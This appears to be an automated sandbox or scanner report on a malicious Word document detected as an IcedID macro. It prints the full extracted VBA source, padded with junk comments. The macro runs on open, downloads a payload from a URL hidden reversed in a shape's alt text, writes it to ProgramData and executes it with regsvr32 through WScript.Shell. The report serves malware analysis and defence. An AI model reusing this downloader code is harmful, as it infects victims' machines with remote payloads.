Verdict: MALICIOUS
Risk Score: 230

Heuristics (6)

- ClamAV: Doc.Macro.ICEID1020-9781212-0 [critical] (CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML [medium] (OOXML_VBA), 3 related findings
  Document contains a VBA project — VBA macros present
- CreateObject call [high] (OLE_VBA_CREATEOBJ)
  Matched line in script: Set BAlSR = CreateObject("Script" + BhVUl)
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
  Matched line in script: Sub AutoOpen()
- Embedded URL [info] (EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 extracted URLs are Office Open XML namespace URIs under schemas.microsoft.com and schemas.openxmlformats.org, each labelled "In document text (OOXML body / shared strings)".
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11818 bytes | 16bc69d20cb3c685272412d4681a875564152369eba937327ad61280dfb073c2 |

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "pkXkO"
Sub UMSdl(IRxAv, Optional ByVal fsBFk As String = "c:\programdata\VqlOy.txt", Optional ByVal BhVUl As String = "ing.FileSystemObject")
' Pascal bonbons pawned licences
' Addictiveness painstaking propellers sundries
' Souring handcart scoundrels
' Along cloudiest dozier bingo ejections
' Graters golfer employable
' Soften determined
' Microbial antiabortionists lingerer cypress
' Irreproachably
' Sadist dismissals
' Campsite sublimes
' Subtractive yeas
' Loyal prototypes
' Respectively leisure adios resonant
' Sucker tack hallowed meagre doubled ironlady
' Effeminacy
Set BAlSR = CreateObject("Script" + BhVUl)
' Deskilling python
' Roamed reschedule
' Deserve chiming
' Tori casements sheep amphibians
' Crazy briskness
Set LQXuQ = BAlSR.CreateTextFile(fsBFk)
' Overwrote disrobing revive renumber
' Indicted compressions
' Insanities madams oddjob
' Firebox skimming slowest ostriches
' Flukey crystallisation archetypical shrieks intercessions
' Rowdiest
' Amazingly sympathised declarers superimposition fastings
' Flurried creeks extinguishment knuckledusters
LQXuQ.WriteLine IRxAv
' Caramels coefficient
' Reassess
' Glossiest reprieved
' Hydrogen
' Spectroscopically gongs sluiced snoopy
LQXuQ.Close
' Blasphemer crowed knuckles ebony dilator progressively
' Newcomer float unjustifiable masculine
' Declaim pits fives infidels
' Storekeepers collage welltodo malformation
' Borderline mouthed veracity paddock
' Chicanery propulsion leprechaun possessive
' Previously
' Gazebo
' Smoothing campanological lavender
' Compasses showdown
' Faintly gelatinous sympathisers
' Surviving lamina prick fuddles
' Hydrants sensing conscripts infuriated misogynists marketable
' Oeuvre conman priest
' Tingliest
' Pele swashbuckling teeniest smallish tweak
' Assailable renter stressed brocaded compromises
' Pastels choicest format
' Mullet diacritical
' Mousey ids impersonated negligence lighters
' Acclamations distinct implemented admirals
' Undercut profanely
' Prayer receipt cosmetics objects fragrance
' Spokesman disbelievers
' Sicily melatonin bid
' Siphons swiped fanatics hazarded
' Competency concatenations circuitous husbandman volatility
' Toeing blockbusters
' Vibrator purveyed storeroom
' Mistrusted sniffing
' Strafe immunities
' Kebabs midfielders retrieve
' Shear icebergs
' Unfaithfulness smilingly imbecilic crunchy
' Conservations finnish galileo blackout ends vigil
' Petrified feud stinged civilities eyeglass
' Categorises hour cottages
' Overhauls
' Calorimetry pale payable voter dishwashers
End Sub
' Hail
' Muddier sponsorship unbent conjurors clutch vortexes
' Schoolmates inanity
' Breezed draining retort
' Isomorphism rummage deplete blockbusters
' Incidentally quipper gametes
Sub AutoOpen()
' Pathology storage cuff subscribes ambled masthead plover
' Intriguingly liaising asian potters leone architectonic
' Apparently amphetamines
' Nourished berths biochemical powerless harboured
' Snored
' Hardware disarmingly
' Flung polytheism stags gorge
' Easily streetwise
' Enable eternity happiness
' Proximal resurgence literatures chafe
' Chiefly chesterfield
' Community arguer neutralist magnifies deposition convinces
' Curia
' Geniality hoarding
' Puller equations gabble
' Righting
' Renegotiation sterilise sniffed dually
' Terse
' Gurgling undeterred
' Prismatic logs fishers ladybird discipline
' Relight
' Risks secretiveness wails
' Jeeringly reiteration job
' Motivations requisitioning
' Humiliates
' Agonies oxides
' Contralto bemoan coldly van
' Stalwart indicting thrombosis cognitive
' Oboe announcement
Dim ZKxqU As New agYHw
' Naming chronometer
' Hornpipe cousinly obeying
' Inscribed inferno
' Conjuring valuers fomented
' Parameter oast
IRxAv = ZKxqU.usTTN("MSXML2.serverXMLHTTP")
' Equivocating haphazard chuffed naughtiness pecking potter
' Unforgettable distress physiology
' Electrocardiogram subsequent graveyards snowbound bylaws
' Resemblances gosling nogging curative
' Apathetically muscadel doornail
UMSdl fRpuN(IRxAv)
' Workpieces avalanches twining
' Inconsiderate elopes impersonated
' Antelopes vulgar swastikas
' Relations corner prevaricating musketeers solemn lute
' Extinctions janitor flutes
' Tucker july cantered award
' Spotlight lumped enchantingly molester
' Mechanised oxygenated palpitation circumlocutory
' Millet
wcXTS zASTd(0) + "vr32 c:\programdata\VqlOy.txt", "ws"
End Sub
Function MGcKG(XLzVL, ZdbRh)
' Foulest schoolmistress upbraid newly incisions
' Sideshows skip parallelism ploys
' Puma
' Overreacts eatings undergrounds constrictive specifics wheelbarrows
' Predation portmanteau manoeuvrability heathenism
' Surmised
' Terminates patriarchs differentiate grips
MGcKG = Split(XLzVL, ZdbRh)
End Function
Attribute VB_Name = "cILzf"
' Diocesan mossier layperson rulers
' Ports agglutinative
' Pelvises conifer handshakes decoder
' Monomeric maker stellated
' Brokenly photogenic rhetoricians displays converging
' Pulse opinion movement overfly imprisonment
Function fRpuN(Jkhgf)
' Policewomen
' Dismounts itemised
' Unsuited winkers carsick balm
' Does
' Gadded margarine calculates liveable
fRpuN = StrConv(Jkhgf, vbUnicode)
' Polonaises expectancies inquisitiveness testability
' Tokenism helpless
' Stamp
' Sludge pushes presuming sycamores
' Cupidity yeas
End Function
' Printouts giftware fervent deciding
' Trapper untwist priorities
' Reals cavalrymen bikinis
' Tuner
' Acquisition happily
Function oNXZc()
' Irradiation bungled desirability hailstone perioperative
' Wonderland
' Woodpecker watchful
' Idle unprofitably amphitheatres strutting
' Unfavourably trumps soandso
' Wasted brighton sexier impiety
' Horticulturist whining byelaw herb bucks
' Subsection ooze imploring
' Pityingly jasmine upstarts
' Bing apologies unpick glaucoma filler explains
' Circuses whoops review stalked
' Dispute intentioned oversight
With ActiveDocument.shapes(1)
oNXZc = .AlternativeText
End With
End Function
' Unprecedentedly courtiers
' Authentication skydived booed
' Peculiarities paramount sniffer venerable
' Conspirators grammar
Function zASTd(amMsd)
' Optimally onuses
' Zany surcharges crags daybreak boney
' Nesting skittles aeon caviare
' Libertarianism
' Guy
' Calvin accountability
' Synonymously canisters
' Something
' Careering requited whipping
' Bungling deleter chop meditatively uproar intermittently
' Platens fount cultivated
' Demeanour credibility razing
evBIW = oNXZc()
wmzfI = MGcKG(evBIW, "###")
bAFIb = wmzfI(amMsd)
zASTd = bAFIb
End Function
Attribute VB_Name = "agYHw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Reactions plazas
' Censured crumb unless compile
' Routes nauseated
' Catastrophes lucky dowdier radiated speculatively sightless
' Tab
' Chameleons satiate heavyduty
Function usTTN(PgHUm)
' Sextants birthmark tastelessly
' Bamboozle symptomatically teaparty
' Footprint peartrees plops dichotomy
' Sicilian thong scaring
Dim EpmzR As Object
' Dexterity constructions especial
' Pacific decompressed disallows redistribute exorcist
' Reveller india
' Renouncement commander fugues forelock
' Valueadded resilience salem
' Install alludes preponderantly
' Tracers formalised gloomful banners
' Engagements cannibalistic bated whipper
' Quotidian accelerate lecher boa manages
' Seated aspersions
' Pleasing salons
' Shrinkable beck shoguns olm barbiturate minedetector rolling bloodletting
Set EpmzR = CreateObject(PgHUm)
' Shortfalls highlighter
' Ongoing ligaturing concocted mullioned beryllium
' Slovenia
' Detectability baker knifes unfriendly
' Offcuts clientele
' Errant epoxies valueformoney extensiveness
' Mailmen
' Gunpowder indirect
' Wigwams volcanism aces drawers
' Chunk yarn
' Compel familiarising hippodrome
' Conceivability recompensed tonsil penetrative boar befits
' Chancery recalling
' Airlifts
' Absorptivity adrenaline
' Sublimation bedded ho
' Climbs raggedly midfielder explorable injects
' Fleetly ayurvedic barbels
' Radishes quells proxy explicit
' Retied sightless punchbowl
' Giddy microcomputer paramour
' Antral
' Teepee ivories agrochemical pimple
XFDPa = zASTd(1)
' Shanks wholegrain playfully
' Heave reversal umpteenth
' Prat minerals voracity neutrals ulster
' Oldmaids pall reeling
' Contrivances coursework
EpmzR.Open "GET", Reverse(XFDPa), False
' Adulatory einstein firmer convocation six bluer dikes
' Remembering intimidates successions
' Gassing blacken philanthropist supersede nodule wired
' Corals intricacies
' Incoherency hearable
' Movable
EpmzR.Send
' Despairing umpiring irascibly liquids
' Orators bedsheets charwoman bedder
' Pageant winded ogled
' Niggle pings
' Whiskies earlier infirmities sulk
' Secondrate
usTTN = EpmzR.responsebody
End Function
Attribute VB_Name = "UpQZP"
Sub wcXTS(oStUc, kaoEZ)
' Cocked
' Mouldiest comedian breeder
' Arab coordinates
' Detesters
' Nigeria beermats
' Cocking
' Dispatch garters imitative
Set xmrZr = CreateObject(kaoEZ + "cript.shell")
' Stammers ladyships everincreasing mineral welltimed delaying searcher
' Trusted admiral
' Tawny programmes apprise homophobia thieves likelihood mouselike
' Whereby aitches taxicab coprocessors
' Antique
' Satsumas eurydice burials unbroken terror
' Patrician monster termini
' Hymn impeccably sunrise naturalistic
' Autocrats misprints fixedly dolphinarium
' Squared unmemorable selfportrait unswerving exports
' Cycads irreversibly sprawling
' Refuels vulgarity excised hypothetical
' Litchi glass thalamus precipitate quarts shortcircuit
' Crispier punishing horsebox
' Hydrangea impeding volleys oilmen
' Algal minefields
' Discussions
' Feelers
' Wholesome spotlessly exoskeleton destructive
' Lens unevenly mechanised hopper discomfited blackball
' Raw baby misanthropes
' Dustily
' Discontinuities strands
' Funerary vests electability
' Rumania aloe
' Perceptibly sturgeon imprint tease
' Snoozing respectfully franked
' Autopsies lease carcinoma versatile
' Passives marmots underlay
' Auctioning
' Flawed houses malt
' Fumigate
' Slashing gadgets selfdestructing valuers
' Fleeting
' Stoneless prime resetting reneging niagara
' Flub gluon gluey bonnets spurge
' Bureaucracy impracticalities bloomy
' Misprints pall
' Engines frailest shorted sawn psychiatrists
' Plundered gruff
' Lexicons necessarily
' Within paella scoreline gritty maintainable literacy
' Ecosystems headers misinterprets
' Interspersed broadsides penitent genoa
' Kingsize drums campuses limelight
' Intro
' Seismologists magnitudes scroll
' Stooges dexterous export
xmrZr.exec oStUc
' Arcaneness stiffness abominably
' Brazil overlaid
' Eleventh
' Gurgle newsmen deletions republish
' Teetotaller kilns spade depot
' Colourblind jacking dykes emptily thoughtfully sincerity
' Stinger evaluates hankering cyprians
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes | e841efede6aa44559fb7a55f51c93732beb666c3a552032707e78c533bb60dec |

Detection: ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely